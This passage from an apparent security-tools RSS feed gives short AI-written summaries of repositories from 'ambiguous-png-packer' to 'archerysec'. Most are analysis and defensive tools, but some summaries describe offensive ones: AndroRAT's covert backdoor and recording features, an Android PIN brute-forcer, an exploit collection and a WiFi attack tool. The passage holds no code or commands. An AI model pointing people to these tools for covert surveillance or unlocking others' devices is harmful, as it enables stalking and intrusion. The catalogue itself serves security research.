&lt;p&gt;&lt;strong&gt;This is a list of privacy-respecting frontends to popular services like social media. All of them are cross-plattform webapps and should work on your device no matter the OS and hardware.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>ambiguous-png-packer</title><link>https://rainmana.github.io/hackyfeed/tools/davidbuchanan314-ambiguous-png-packer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/davidbuchanan314-ambiguous-png-packer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ambiguous PNG Packer is a tool designed to create PNG files that display differently when viewed in Apple software versus non-Apple software. Its primary use case is to demonstrate the manipulation of image rendering based on the viewer&amp;rsquo;s platform, showcasing unique features such as the ability to produce different images through refreshes, highlighting potential vulnerabilities in Apple&amp;rsquo;s image handling mechanisms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ambiguous-png-packer"&gt;Ambiguous PNG Packer&lt;/h1&gt;
&lt;p&gt;Craft PNG files that appear completely different in Apple software&lt;/p&gt;</description></item><item><title>Android-Exploits</title><link>https://rainmana.github.io/hackyfeed/tools/sundaysec-android-exploits/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sundaysec-android-exploits/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Android-Exploits is a repository that consolidates various Android exploits and provides a comprehensive guide for conducting Android exploitation. Its primary use case is to facilitate the testing and assessment of Android application security vulnerabilities through categorized exploits such as Denial of Service, local, remote, and web application exploits. Notable features include detailed instructions for utilizing the exploits alongside third-party tools like ExploitPack, along with references to common mobile hacking tools and resources related to Android security risks.&lt;/p&gt;</description></item><item><title>Android-PIN-Bruteforce</title><link>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-android-pin-bruteforce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-android-pin-bruteforce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Android-PIN-Bruteforce is a tool that allows users to unlock Android devices by executing a brute-force attack on the lockscreen PIN. Utilizing a rooted Kali Nethunter phone connected via USB OTG, it emulates keyboard input to automatically input and retry PIN combinations, supporting lengths from 1 to 10 digits and providing features such as configurable delays, optimized PIN lists, and the ability to bypass phone pop-ups. The tool does not require the locked device to be rooted and works across various Android versions.&lt;/p&gt;</description></item><item><title>Android-Security-Exploits-YouTube-Curriculum</title><link>https://rainmana.github.io/hackyfeed/tools/actuator-android-security-exploits-youtube-curriculum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/actuator-android-security-exploits-youtube-curriculum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Android Security &amp;amp; Reverse Engineering YouTube Curriculum is a comprehensive educational resource focused on various aspects of Android security, including exploits, reverse engineering, and vulnerabilities in mobile applications. It features a curated collection of talks and demonstrations from prominent security conferences, addressing topics like heap exploitation, mobile permissions, and countermeasures against mobile threats. Notably, it educates on advanced concepts such as Bluetooth security, malware analysis, and attack vectors affecting the Android ecosystem, making it essential for cybersecurity practitioners and researchers.&lt;/p&gt;</description></item><item><title>android-unpacker</title><link>https://rainmana.github.io/hackyfeed/tools/strazzere-android-unpacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/strazzere-android-unpacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Android Unpacker tool facilitates the reverse engineering and unpacking of Android applications protected by various obfuscation techniques, including APKProtect and Bangcle. Its notable features include a native unpacker that operates without dependencies on GDB, scripts for unpacking specific protections, and methods for hiding debugging environments from detection. This tool is primarily intended for educational and research purposes in the field of malware analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="android-unpacker"&gt;android-unpacker&lt;/h1&gt;
&lt;p&gt;Android Unpacker presented at Defcon 22: Android Hacker Protection Level 0&lt;/p&gt;</description></item><item><title>android-unpinner</title><link>https://rainmana.github.io/hackyfeed/tools/mitmproxy-android-unpinner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mitmproxy-android-unpinner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Android Unpinner is a tool designed to facilitate the removal of SSL certificate pinning from Android APKs without requiring root access. Utilizing the Frida framework, it modifies only the AndroidManifest.xml file to enable debugging, while dynamically injecting a Frida Gadget via ADB to perform the unpinning process. The tool is equipped with comprehensive dependencies for cross-platform use and supports handling XAPKs by extracting and installing split APKs effectively.&lt;/p&gt;</description></item><item><title>Androl4b</title><link>https://rainmana.github.io/hackyfeed/tools/sh4hin-androl4b/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sh4hin-androl4b/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Androl4b is an Android security virtual machine based on Ubuntu Mate, designed for reverse engineering and malware analysis, incorporating a comprehensive suite of tools and resources. It features updated frameworks, hands-on labs, and various security assessment tools like Radare2, Frida, and MobSF, facilitating both static and dynamic analysis of Android applications. The environment is tailored for security researchers and developers to enhance their understanding and skills in Android security.&lt;/p&gt;</description></item><item><title>Andromeda</title><link>https://rainmana.github.io/hackyfeed/tools/secrary-andromeda/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secrary-andromeda/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Andromeda is a performance-oriented tool designed for accelerating the initial reverse engineering of Android applications, leveraging its C/C++ implementation. It aims to simplify the analysis process with a straightforward command-line interface, making it accessible for security researchers and developers. Currently in early development, Andromeda highlights the potential for speed improvements over alternative solutions in the same domain.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://user-images.githubusercontent.com/16405698/65393541-89490480-dd8a-11e9-92a3-727799c30b02.png" alt="andromeda"&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Andromeda&lt;/code&gt; makes initial reverse engineering work of &lt;code&gt;Android&lt;/code&gt; applications bit faster and easier.
Compared to other alternatives, it&amp;rsquo;s written in &lt;code&gt;C/C++&lt;/code&gt; and has a noticeable performance advantage.&lt;/p&gt;</description></item><item><title>AndroRAT</title><link>https://rainmana.github.io/hackyfeed/tools/karma9874-androrat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/karma9874-androrat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AndroRAT is a remote access tool for Android devices that allows users to control and retrieve information from the device. Its primary use case includes monitoring and managing Android systems covertly, featuring capabilities such as persistent backdoor access, audio and video recording, and obtaining device location and SIM details. Notably, AndroRAT consists of a client/server architecture implemented in Java for Android and Python for the server side, enabling it to run on a wide range of Android versions from 4.1 to 9.0, with additional functionalities on Android 10.&lt;/p&gt;</description></item><item><title>AndroRAT</title><link>https://rainmana.github.io/hackyfeed/tools/the404hacking-androrat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the404hacking-androrat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AndroRAT is a Remote Administration Tool designed for Android devices, enabling the remote control and data retrieval from the Android system. Key functionalities include accessing contacts, call logs, messages, GPS location, and multimedia capabilities like capturing photos and streaming audio and video. The tool operates as a background service triggered by SMS or calls, providing a comprehensive suite for remote monitoring and management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="androrat"&gt;&lt;a href="https://github.com/The404Hacking/AndroRAT"&gt;AndroRAT&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Remote Administration Tool for Android&lt;/p&gt;</description></item><item><title>AngryOxide</title><link>https://rainmana.github.io/hackyfeed/tools/ragnt-angryoxide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ragnt-angryoxide/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AngryOxide is a Rust-based 802.11 attack tool designed for penetration testing and WiFi exploitation research. It provides an active state-based attack engine that retrieves EAPOL messages from access points and clients, with features such as target filtering, auto-hunting capability, and GPS integration for geo-fencing. The tool is equipped with a terminal UI, headless operation mode, and a variety of automated attacks aimed at retrieving cryptographic data for later cracking with tools like Hashcat.&lt;/p&gt;</description></item><item><title>Anthropic-Cybersecurity-Skills</title><link>https://rainmana.github.io/hackyfeed/tools/mukul975-anthropic-cybersecurity-skills/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mukul975-anthropic-cybersecurity-skills/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Anthropic Cybersecurity Skills is an extensive open-source repository that provides AI agents access to 753 structured cybersecurity skills across 26 domains, offering capabilities such as memory forensics and Kubernetes RBAC auditing. The skills adhere to the agentskills.io standard, featuring a YAML structure for quick discovery and are fully mapped to MITRE ATT&amp;amp;CK and aligned with NIST CSF 2.0, enabling AI agents to perform advanced security tasks with enhanced contextual knowledge. This tool simplifies installation and empowers various platforms like Claude Code and GitHub Copilot to integrate these capabilities efficiently.&lt;/p&gt;</description></item><item><title>anti-emulator</title><link>https://rainmana.github.io/hackyfeed/tools/strazzere-anti-emulator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/strazzere-anti-emulator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The anti-emulator tool is designed to detect emulated Android environments, leveraging various detection techniques inspired by both malware behavior and innovative methodologies. It serves primarily for educational and research purposes in the context of malware analysis and reversing, offering a collection of detection mechanisms while promoting responsible use. The project includes both source code and supportive materials, such as presentation slides from its initial unveiling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="anti-emulator"&gt;anti-emulator&lt;/h1&gt;
&lt;p&gt;Android Anti-Emulator, originally presented at HitCon 2013: &amp;ldquo;Dex Education 201: Anti-Emulation&amp;rdquo;&lt;/p&gt;</description></item><item><title>AntiCheat-Testing-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/niemand-sec-anticheat-testing-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/niemand-sec-anticheat-testing-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The AntiCheat-Testing-Framework is a comprehensive tool designed for testing and analyzing various anti-cheat mechanisms in the gaming industry. It provides a modular architecture with several integrated modules, allowing users to customize their setup for specific testing purposes. This framework aims to democratize knowledge in the field of anti-cheat research, facilitating both learning and practical application.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="anticheat-testing-framework"&gt;AntiCheat-Testing-Framework&lt;/h1&gt;
&lt;p&gt;Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I&amp;rsquo;m realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it.&lt;/p&gt;</description></item><item><title>AntiDBG</title><link>https://rainmana.github.io/hackyfeed/tools/hackovert-antidbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackovert-antidbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AntiDBG is a tool designed for implementing various anti-debugging techniques on Windows, categorized by methods such as memory, CPU, timing, and forced exceptions. The primary use case is to create self-contained checks that automatically detach debuggers, enhancing the security of applications against reverse engineering. Notable features include a simple API for integration, a testing application named The Gauntlet to evaluate resistance against these techniques, and an emphasis on readability for educational purposes.&lt;/p&gt;</description></item><item><title>antivmdetection</title><link>https://rainmana.github.io/hackyfeed/tools/nsmfoo-antivmdetection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nsmfoo-antivmdetection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Antivmdetection is a utility script designed to obscure virtual machine (VM) detection techniques by modifying settings within VirtualBox without altering its base. Its primary use case is for enhancing the anonymity of VMs by generating a shell template for host-side modifications and a Windows PowerShell script for guest-side adjustments, addressing various malware fingerprinting methods. Notable features include the ability to automate the configuration process while maintaining compatibility across VirtualBox updates and generating necessary scripts for both host and VM installations.&lt;/p&gt;</description></item><item><title>API-SecurityEmpire</title><link>https://rainmana.github.io/hackyfeed/tools/cyber-guy1-api-securityempire/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyber-guy1-api-securityempire/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; API Security Empire is a comprehensive resource designed for enhancing API security and conducting penetration testing, featuring mindmaps, tips, and tools based on OWASP TOP 10 API guidelines. It covers information gathering, advanced recon techniques, and detailed methodologies for attacking RESTful, SOAP, and GraphQL APIs. Notable features include updated mindmaps in various formats, a curated list of essential tools, and practical exercises to test penetration skills.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-api-security-empire"&gt;🛡️ API Security Empire&lt;/h1&gt;
&lt;div align="center"&gt;
&lt;img src="https://github.com/Cyber-Guy1/API-SecurityEmpire/assets/66295316/8b741387-350f-4a61-bce1-d29c6a9ac27d" width="60%" height="60%"&gt;
 &lt;br&gt;
 &lt;small&gt;Project Credits: &lt;a href="https://www.linkedin.com/in/momen-eldawakhly-3b6250204"&gt;Momen Eldawakhly (Cyber Guy)&lt;/a&gt;&lt;/small&gt;
&lt;/div&gt;
&lt;br&gt;
In this repository you will find: Mindmaps, tips &amp; tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!!
&lt;h2 id="-first-gate-recon"&gt;🚪 First gate: &lt;code&gt;{{Recon}}&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon:&lt;/p&gt;</description></item><item><title>APISecurityBestPractices</title><link>https://rainmana.github.io/hackyfeed/tools/gitguardian-apisecuritybestpractices/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gitguardian-apisecuritybestpractices/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitGuardian offers a proactive solution for developers to detect and mitigate the exposure of sensitive API secrets, database credentials, and certificates in real-time within their GitHub repositories. Notable features include immediate alerts upon detecting potential leaks before the git process completes, along with comprehensive resources for best development practices and leak mitigation strategies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gitguardian-documentation-and-resources"&gt;GitGuardian Documentation and Resources&lt;/h1&gt;
&lt;p&gt;This repository provides resources for developers to keep their secrets secret.&lt;/p&gt;</description></item><item><title>apk.sh</title><link>https://rainmana.github.io/hackyfeed/tools/ax-apk.sh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ax-apk.sh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; apk.sh is a Bash script designed to streamline the reverse engineering of Android applications by automating tasks such as pulling, decoding, rebuilding, and patching APK files. It incorporates apktool for disassembling and reassembling resources, supports direct bytecode manipulation to prevent decompilation errors, and facilitates the integration of the frida-gadget for dynamic analysis without requiring a rooted device. Notable features include support for app bundles, multi-architecture compatibility, and code signing.&lt;/p&gt;</description></item><item><title>APKHunt</title><link>https://rainmana.github.io/hackyfeed/tools/cyber-buddy-apkhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyber-buddy-apkhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APKHunt is a static code analysis tool specifically designed for Android applications, leveraging the OWASP MASVS framework to identify and rectify security vulnerabilities. It offers comprehensive scanning capabilities, including support for multiple APK files, a low false-positive rate, and optimized rules for accurate vulnerability detection, making it suitable for both mobile developers and security testers. Notably, it produces results in a user-friendly TXT format and is tailored for Linux environments.&lt;/p&gt;</description></item><item><title>APKiD</title><link>https://rainmana.github.io/hackyfeed/tools/rednaga-apkid/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rednaga-apkid/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APKiD is a tool designed to analyze Android APK files by identifying various compilers, packers, and obfuscators used in their creation, functioning similarly to PEiD for Windows applications. It supports configurable scanning options, outputs results in JSON format, and facilitates contributions for recognizing additional packaging methods. The tool is primarily used for Android security analysis, aiding in the detection of pirated or malicious applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apkid"&gt;APKiD&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://app.travis-ci.com/rednaga/APKiD"&gt;&lt;img src="https://app.travis-ci.com/rednaga/APKiD.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/v/apkid.svg" alt="PyPI"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/pyversions/apkid.svg" alt="PyPI - Python Version"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/format/apkid.svg" alt="PyPI - Format"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/l/apkid.svg" alt="PyPI - License"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>apkleaks</title><link>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-apkleaks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-apkleaks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APKLeaks is an automated tool for scanning Android APK files to identify potentially sensitive information such as URIs, endpoints, and secrets. It integrates with the JADX disassembler for decompilation and offers customizable pattern matching through user-defined JSON files, alongside various output options, including text and JSON formats. Key features include support for disassembler arguments, making it flexible for advanced usage scenarios in security assessments of mobile applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apkleaks"&gt;APKLeaks&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://badge.fury.io/gh/dwisiswant0%2fapkleaks.svg"&gt;&lt;img src="https://badge.fury.io/gh/dwisiswant0%2fapkleaks.svg" alt="version"&gt;&lt;/a&gt;
&lt;a href="https://github.com/dwisiswant0/apkleaks/issues"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat" alt="contributions"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>apkstudio</title><link>https://rainmana.github.io/hackyfeed/tools/vaibhavpandeyvpz-apkstudio/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vaibhavpandeyvpz-apkstudio/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APK Studio is an open-source, cross-platform Integrated Development Environment (IDE) designed for reverse-engineering Android application packages (APKs). Its notable features include a built-in code editor with syntax highlighting for smali and other file types, automatic installation of essential tools, and support for manufacturer-specific frameworks, making it a comprehensive tool for decompiling, recompiling, and signing APKs. Additionally, APK Studio supports command-line operations, theming, and provides quick search functionalities across projects, enhancing the user experience for developers and analysts.&lt;/p&gt;</description></item><item><title>apkurlgrep</title><link>https://rainmana.github.io/hackyfeed/tools/ndelphit-apkurlgrep/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ndelphit-apkurlgrep/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ApkUrlGrep is a tool designed for extracting endpoints from APK files. Its primary use case is to facilitate the analysis of mobile applications by identifying URLs and their paths embedded within the app. Notable features include the ability to output both the discovered URLs and their corresponding paths, making it a valuable resource for security researchers and penetration testers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apkurlgrep"&gt;ApkUrlGrep&lt;/h1&gt;
&lt;p&gt;Tool that allow extract endpoints from APK files
&lt;img src="https://i.ibb.co/V3nFRwJ/image-2020-05-06-21-30-30.png" alt="alt text"&gt;&lt;/p&gt;</description></item><item><title>apple-knowledge</title><link>https://rainmana.github.io/hackyfeed/tools/hack-different-apple-knowledge/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hack-different-apple-knowledge/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;hack-different/apple-knowledge&amp;rdquo; repository hosts a compilation of reverse-engineered Apple data formats and protocols, primarily serving as a resource for jailbreak developers and hobbyists. Notable features include the availability of YAML files for machine-readable data, a collection of binary analysis and modification tools, and a Homebrew tap for easy installation of jailbreak-related utilities. The project emphasizes adherence to copyright laws while encouraging community contributions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apple-data-formats-and-knowledge"&gt;Apple Data Formats and Knowledge&lt;/h1&gt;
&lt;p&gt;A collection of reverse engineered Apple formats, protocols, or other interesting bits.&lt;/p&gt;</description></item><item><title>AppleNeuralHash2ONNX</title><link>https://rainmana.github.io/hackyfeed/tools/asuharietygvar-appleneuralhash2onnx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/asuharietygvar-appleneuralhash2onnx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AppleNeuralHash2ONNX is a tool that converts Apple&amp;rsquo;s NeuralHash model, used for CSAM detection, into the ONNX format, allowing for greater integration and use in various deep learning frameworks. Notable features include the ability to tolerate image resizing and compression, and a comprehensive conversion process that includes decoding model components stored in LZFSE format. The repository also provides a demo script for testing the converted model&amp;rsquo;s functionality.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="appleneuralhash2onnx"&gt;AppleNeuralHash2ONNX&lt;/h1&gt;
&lt;p&gt;Convert Apple NeuralHash model for &lt;a href="https://www.apple.com/child-safety/pdf/CSAM_Detection_Technical_Summary.pdf"&gt;CSAM Detection&lt;/a&gt; to &lt;a href="https://github.com/onnx/onnx"&gt;ONNX&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>ApplicationInspector</title><link>https://rainmana.github.io/hackyfeed/tools/microsoft-applicationinspector/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/microsoft-applicationinspector/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Microsoft Application Inspector is a source code characterization tool that identifies the features of software components by analyzing code against over 400 rules and regex patterns. Its primary use case lies in aiding users to understand the behavior of both open-source and proprietary codebases, particularly in security contexts, without making determinations of &amp;ldquo;good&amp;rdquo; or &amp;ldquo;bad&amp;rdquo; practices. It supports multiple programming languages and can generate outputs in various formats, enhancing transparency in software analysis.&lt;/p&gt;</description></item><item><title>appmon</title><link>https://rainmana.github.io/hackyfeed/tools/dpnishant-appmon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dpnishant-appmon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AppMon is an automated framework designed for monitoring and tampering system API calls in native macOS, iOS, and Android applications, leveraging the capabilities of Frida. Its primary use case includes intercepting API calls to analyze app behavior and manipulating these calls to alter the original application functionalities. Notable features encompass an API sniffer, an intruder for data manipulation, an Android tracer for analyzing APKs, and tools for creating inspectable IPAs and APKs on non-jailbroken and non-rooted devices respectively.&lt;/p&gt;</description></item><item><title>AppVerifier</title><link>https://rainmana.github.io/hackyfeed/tools/soupslurpr-appverifier/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/soupslurpr-appverifier/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AppVerifier is a tool designed for verifying the authenticity of mobile applications by comparing their package names and signing certificate hashes against provided or internally stored information. Its primary use case is to ensure users can confirm the genuineness of apps and share verification results with others efficiently. Notable features include a user-friendly interface for sharing and receiving verification information and compatibility with the Accrescent app store for enhanced security during downloads.&lt;/p&gt;</description></item><item><title>APT_REPORT</title><link>https://rainmana.github.io/hackyfeed/tools/blackorbird-apt_report/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blackorbird-apt_report/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APT_REPORT is a comprehensive collection of threat intelligence, samples, and reports on advanced persistent threat (APT) groups, particularly those linked to specific countries. It focuses on detailed analyses of various APT campaigns, enabling users to understand tactics and recent developments in cyber threat landscapes. Notable features include references to extensive case studies and operational details of prominent threat actor groups, enhancing situational awareness for cybersecurity professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apt_report-collected-by-blackorbird"&gt;APT_REPORT collected by @blackorbird &lt;a href="https://x.com/blackorbird"&gt;https://x.com/blackorbird&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Interesting apt report &amp;amp; sample &amp;amp; malware &amp;amp; technology &amp;amp; intellegence collection&lt;/p&gt;</description></item><item><title>APTRS</title><link>https://rainmana.github.io/hackyfeed/tools/aptrs-aptrs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aptrs-aptrs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APTRS (Automated Penetration Testing Reporting System) is a Python and Django-based tool that automates the generation of penetration testing reports in PDF and Excel formats, enhancing efficiency for security professionals. Its primary use case is to facilitate organized and streamlined reporting while allowing users to manage and monitor vulnerabilities across various projects. Notable features include support for multiple platforms, a user-friendly web interface, and integration with various CI/CD workflows for continuous testing.&lt;/p&gt;</description></item><item><title>archerysec</title><link>https://rainmana.github.io/hackyfeed/tools/archerysec-archerysec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/archerysec-archerysec/</guid><description>&lt;blockquote&gt;
